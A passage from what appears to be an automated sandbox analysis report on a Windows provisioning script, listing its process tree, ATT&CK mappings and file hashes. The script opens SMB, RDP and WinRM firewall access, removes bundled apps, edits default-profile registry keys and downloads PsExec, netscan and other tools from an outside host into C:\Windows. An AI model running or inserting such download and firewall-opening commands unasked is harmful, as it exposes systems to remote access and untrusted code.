  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
  2⤵
  PID:4152
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
  2⤵
  PID:2252
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
  2⤵
  PID:208
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all
  2⤵
  PID:4544
- - C:\Windows\system32\netsh.exe
    netsh firewall set service type=remoteadmin enable profile=all
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6744
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -h off
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1004
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2920
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -x -standby-timeout-dc 15
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -setacvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Windows\SYSTEM32\powercfg.exe
  powercfg -setdcvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxProvisionedPackage -online | where-object {$_.displayname -like "*OneNote*" -or $_.displayname -like "*bing*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*xbox*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*3DBuilder*" -or $_.displayname -like "*BingFinance*" -or $_.displayname -like "*BingNews*" -or $_.displayname -like "*BingSports*" -or $_.displayname -like "*ConnectivityStore*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*MicrosoftSolitaireCollection*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*Sway*" -or $_.displayname -like "*WindowsMaps*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*ZuneMusic*" -or $_.displayname -like "*ZuneVideo*" -or $_.displayname -like "*xbox*"} | remove-appxprovisionedpackage -online
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxPackage | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxPackage -allusers | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage -allusers
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/devcon.exe -outfile C:\windows\devcon.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Fping.exe -outfile C:\windows\Fping.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/grep.exe -outfile C:\windows\grep.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/netscan.exe -outfile C:\windows\netscan.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/nircmd.exe -outfile C:\windows\nircmd.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/procexp.exe -outfile C:\windows\procexp.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Procmon.exe -outfile C:\windows\Procmon.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/putty.exe -outfile C:\windows\putty.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/TreeSizeFree.exe -outfile C:\windows\TreeSizeFree.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/winmtr.exe -outfile C:\windows\winmtr.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/whois.exe -outfile C:\windows\whois.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg load HKU\default C:\users\default\ntuser.dat
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:3632
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
  2⤵
  PID:1636
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
  2⤵
  PID:880
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
  2⤵
  PID:528
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
  2⤵
  PID:4664
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
  2⤵
  PID:4356
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
  2⤵
  PID:2292
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:5516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
  2⤵
  PID:4144
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
  2⤵
  PID:1236
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:4556
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:7132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:5004
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:760
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:6944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
  2⤵
  PID:972
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg unload HKU\Default
  2⤵
  PID:5312
- - C:\Windows\system32\reg.exe
    reg unload HKU\Default
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb5a7c84bb571c13878f3f50797f79cb

SHA1
c42cf59af6b34ba84dbce8eb9d8760563473aa34

SHA256
9a18c090421b64d07e3fdbc3e61beb26e8e827b8f5cd42cb6a7a3dd08fb3b947

SHA512
646bbb5968ac16f975d67f630f7b47fe82779b6c9c9a472e1a40df294862fc60adc5d5cc12b01f34839ba1cd6ec15fc983c42a050e879346a4b683f1354b030b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
663B

MD5
a8614a193d22a902e98728b2058ef931

SHA1
b6cff2d21c7199c435a75eb81925d81e9950a6c2

SHA256
dc525881a4bde1bdd97d5f86d6d9b7e280433dac86a7cb372561e21567935a14

SHA512
bdc1c190a230eb04e9e7f5474cf055e2b62fc7c671b1b5bd27f0c55aeffc064e0e48c9428ad85608b2420e12646b4388ff5337826413af1ffc32e9d036418f33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
796B

MD5
7f8b53a986035930ca6cbedf83241248

SHA1
b922174446409d908e1daed6a06eb919230f92c7

SHA256
64be5a826411a6be75d1fb63a60c8e38634a31f4a8e3c6914ccc8dd1c9b7777c

SHA512
46c32bf34e1d06caade3357591bd62e7e707f1d26b0b8f4da18c8e1d2f84459e4467b70d24c93fb06a31800167101dd31c44c320d94f251dd1131e0598d13cc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
055cd1930e45c3d77aa744d53bcc29d9

SHA1
af1464daf329f36930b71fb33119c61a13472b6d

SHA256
fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c

SHA512
00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98ca3263bd17f6f4308b8e4ff7530958

SHA1
6f41bacd42af6a11bb8d1516f7b07171087e7a17

SHA256
d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19

SHA512
f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ba7bb8c22d72f7d6094bf4b7a11fd2df

SHA1
e68eab39081c17997a16bca1667f1544f11804a5

SHA256
0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a

SHA512
58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6b62fabc50bfae977635bcebb14c566

SHA1
653628f0db5229d9136ee897e92bedba3b1d91aa

SHA256
bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be

SHA512
9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
400B

MD5
2395435030954e996dda30cc02daebdd

SHA1
6d4493185988373c6dc2411fea8bad6c9648fd4a

SHA256
43e896907237944324de346cbc605dbc508f7a2c107c7f888f919e2d5cd046bc

SHA512
f20d578d95805ef321a32230d6b249db0dd9261f4937e4dcf9706430d55d1b4088aa7fc9cc9878932b3f7a99b8afac30368c6002e348a1d1a25b4375572044fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkvnhyod.u4n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/5008-11-0x000001B5EFB20000-0x000001B5EFB42000-memory.dmp

Filesize
136KB

Download
memory/5296-156-0x00000196C9680000-0x00000196C969C000-memory.dmp

Filesize
112KB

Download